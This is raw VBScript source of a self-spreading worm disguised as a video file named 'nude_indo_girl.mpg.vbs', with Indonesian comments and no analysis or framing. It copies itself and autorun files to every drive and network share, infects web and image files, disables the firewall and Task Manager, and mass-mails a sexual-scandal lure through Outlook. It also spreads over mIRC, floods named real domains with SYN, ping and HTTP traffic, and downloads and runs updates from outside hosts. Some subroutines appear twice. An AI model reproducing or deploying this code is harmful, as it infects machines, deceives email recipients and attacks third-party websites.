w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"
fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0
duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"
fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub
'teknik network spreading dari csw
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub
sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll
Set mywisdom = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1="<script>"
tag2="</script><script src=nude_indo_girl.mpg.vbs></script><script>window.open('nude_indo_girl.mpg.vbs');</script>"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if
Next
NewFile.Close
end sub
'nonaktifkan firewall
sub disable_firewall()
On Error Resume Next
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = FALSE
end sub
'biar tetep eksis
sub anti_delete()
On Error Resume Next
Set fso= Createobject("scripting.filesystemobject")
Set mywisdom2= fso.opentextfile(wscript.scriptfullname, 1)
pengujian_keberadaan= mywisdom2.readall
mywisdom2.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set ada_terus= fso.createtextfile(wscript.scriptfullname, True)
ada_terus.writepengujian_keberadaan
ada_terus.Close
End If
Loop
end sub
'fungsi untuk syn dos ke target
sub kirim_syn_target()
on error resume next
jam=Hour(Now())
menit=Minute(Now())
if jam=12 or jam=15 or jam=16 then
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "tbd.my"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
if jam=18 or jam=21 or jam=22 then
'syn sec-r1z.com
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "sec-r1z.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
if jam=23 or jam=03 or jam=04 or jam=3 or jam=4 then
'syn v4-team
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "v4-team.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
if jam=06 or jam=09 or jam=6 or jam=9 or jam=10 then
'syn hmsecurity.org
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "hmsecurity.org"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
if jam=10 then
'syn ardiantz.com
For i = 0 To 20
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "ardiantz.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
end sub
'fungsi kirim icmp pada tanggal tanggal tertentu yang udah diset
sub kirim_icmp_target()
hari=Day(now())
if hari=12 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping tbd.my -l 1000 -n 10")
end if
if hari=22 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping ardiantz.com -l 1000 -n 10")
end if
if hari=02 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping hmsecurity.org -l 1000 -n 10")
end if
end sub
sub http_ddos_target()
on error resume next
Dim o
menit=Minute(Now())
jam=Hour(Now())
'request tiap jam ke situs target
if menit>55 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
Set x = CreateObject("MSXML2.XMLHTTP")
x.open "GET", "http://sec-r1z.com", False
x.send
Set r = CreateObject("MSXML2.XMLHTTP")
r.open "GET", "http://hmsecurity.org", False
r.send
Set y = CreateObject("MSXML2.XMLHTTP")
y.open "GET", "http://v4-team.com", False
y.send
Set z = CreateObject("MSXML2.XMLHTTP")
z.open "GET", "http://ardiantz.com", False
z.send
next
end if
'http req tbd
if jam=10 or jam=14 or jam=15 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
next
end if
'http req sec-r1z
if jam=16 or jam=18 or jam=19 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://sec-r1z.com", False
o.send
next
end if
'http req v4-team.com
if jam=20 or jam=22 or jam=23 or jam=24 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://v4-team.com", False
o.send
next
end if
'http req hmsecurity.org
if jam=23 or jam=01 or jam=02 or jam=1 or jam=2 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://hmsecurity.org", False
o.send
next
end if
'http req ardiantz.com
if jam=20 or jam=22 or jam=23 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com", False
o.send
next
end if
end sub
'penyebaran ke email via outlook diambil dari potongan kode virus i love you
sub sebarkan_email_hahaha()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "Free Indonesian Girl Nude Scandal Video for You"
male.Body = vbcrlf&"<b>Free Indonesian Girl Nude Scandal Video for You!!!</b> check the attachment. Or download now, click here to download this video: <a href=http://ardiantz.com/~checking/wp-includes/nude_indo_girl.mpg.vbs>nude_indo_girl.mpg [download]</a> , mirror download: <a href=http://yoyoparty.com/upload/nude_indo_girl.mpg.vbs>nude_indo_girl.mpg [mirror download]"
male.Attachments.Add(dirsystem&"\nude_indo_girl.mpg.vbs")
male.Attachments.add(App.Path & "\" & "nude_indo_girl.mpg.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
'pertahanan diri virus aka self defense
sub infek_regiistry_sambil_boker()
dim win,mywisdom
Set fso = CreateObject("Scripting.FileSystemObject")
win = fso.GetParentFolderName(Wscript.ScriptFullName)
Set mywisdom = CreateObject("WScript.Shell")
With mywisdom
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\Path", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\AppDataDirectory", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stask", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
End With
end sub
'strategi perang : siksa musuh pelan pelan
sub infek_ie()
on error resume next
dim hari
hari=Weekday(date)
if hari=1 or hari=2 then
'start page ie diset ke sec-r1z.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://sec-r1z.com","REG_SZ"
elseif hari=3 or hari=4 then
'start page ie diset ke v4-team.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://v4-team.com","REG_SZ"
elseif hari=5 then
'start page ie diset ke ardiantz.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://ardiantz.com","REG_SZ"
else
'start page ie diset ke tbd.my
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://tbd.my","REG_SZ"
end if
end sub
'teknik infeksi dan penyebaran di sistem dan semua drive serta menyembunyikan diri
Sub infek_sistem()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING
mywisdom.run("attrib +r autorun.inf")
mywisdom.run("attrib +r nude_indo_girl.mpg.vbs")
win = fso.GetParentFolderName(Wscript.ScriptFullName)
autorun= win & "\autorun.inf"
satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "i:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"
fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0
duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"
fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub
'teknik network spreading dari csw
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub
sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll
Set mywisdom = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1="<script>"
tag2="</script><script src=nude_indo_girl.mpg.vbs></script><script>window.open('nude_indo_girl.mpg.vbs');</script>"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if
Next
NewFile.Close
end sub
sub download_winsock()
strFileURL = "http://ardiantz.com/~checking/wp-includes/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub
sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub
sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub
sub sebar_ke_irc_1()
Set fso = CreateObject("Scripting.FileSystemObject")
nama_w0rm=Wscript.ScriptFullName
win = fso.GetParentFolderName(Wscript.ScriptFullName)
set scriptini=fso.CreateTextFile("C:\Program Files\mIRC\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick " & nama_w0rm
scriptini.WriteLine "n3=}"
end sub
sub iframe_attack()
jam=Hour(Now())
menit=Minute(Now())
if menit=12 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/iframe.php", False
o.send
next
end if
end sub
sub wget_attack1()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget1.php", False
o.send
data=o.status
next
end if
end sub
sub wget_attack2()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget2.php", False
o.send
data=o.status
next
end if
end sub
sub wget_attack3()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget3.php", False
o.send
data=o.status
next
end if
end sub
sub wget_attack4()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget4.php", False
o.send
data=o.status
next
end if
end sub
sub wget_attack5()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget5.php", False
o.send
data=o.status
next
end if
end sub
sub browsing()
dim Window
jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())
if jam=12 or jam=13 or jam=23 then
set Window = CreateObject("InternetExplorer.Application")
Window.RegisterAsBrowser = True
Window.Navigate("tbd.my")
Window.MenuBar = True
Window.ToolBar = True
Window.AddressBar = True
Window.StatusBar = True
Window.FullScreen = False
Window.Resizable = True
Window.Visible = True
Window.Width = 850
Window.Height = 720
set Window2 = CreateObject("InternetExplorer.Application")
Window2.RegisterAsBrowser = True
Window2.Navigate("hmsecurity.org")
Window2.MenuBar = True
Window2.ToolBar = True
Window2.AddressBar = True
Window2.StatusBar = True
Window2.FullScreen = False
Window2.Resizable = True
Window2.Visible = True
Window2.Width = 850
Window2.Height = 720
set Window3 = CreateObject("InternetExplorer.Application")
Window3.RegisterAsBrowser = True
Window3.Navigate("v4-team.com")
Window3.MenuBar = True
Window3.ToolBar = True
Window3.AddressBar = True
Window3.StatusBar = True
Window3.FullScreen = False
Window3.Resizable = True
Window3.Visible = True
Window3.Width = 850
Window3.Height = 720
set Window4 = CreateObject("InternetExplorer.Application")
Window4.RegisterAsBrowser = True
Window4.Navigate("sec-r1z.com")
Window4.MenuBar = True
Window4.ToolBar = True
Window4.AddressBar = True
Window4.StatusBar = True
Window4.FullScreen = False
Window4.Resizable = True
Window4.Visible = True
Window4.Width = 850
Window4.Height = 720
set Window5 = CreateObject("InternetExplorer.Application")
Window5.RegisterAsBrowser = True
Window5.Navigate("ardiantz.com")
Window5.MenuBar = True
Window5.ToolBar = True
Window5.AddressBar = True
Window5.StatusBar = True
Window5.FullScreen = False
Window5.Resizable = True
Window5.Visible = True
Window5.Width = 850
Window5.Height = 720
end if
end sub
sub download_update_worm1()
jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())
if jam=10 and hari=10 then
strFileURL = "http://ardiantz.com/~checking/wp-includes/patch.vbs"
strHDLocation = "c:\windows\system32\patch.vbs"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end if
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("c:\windows\system32\patch.vbs")
end sub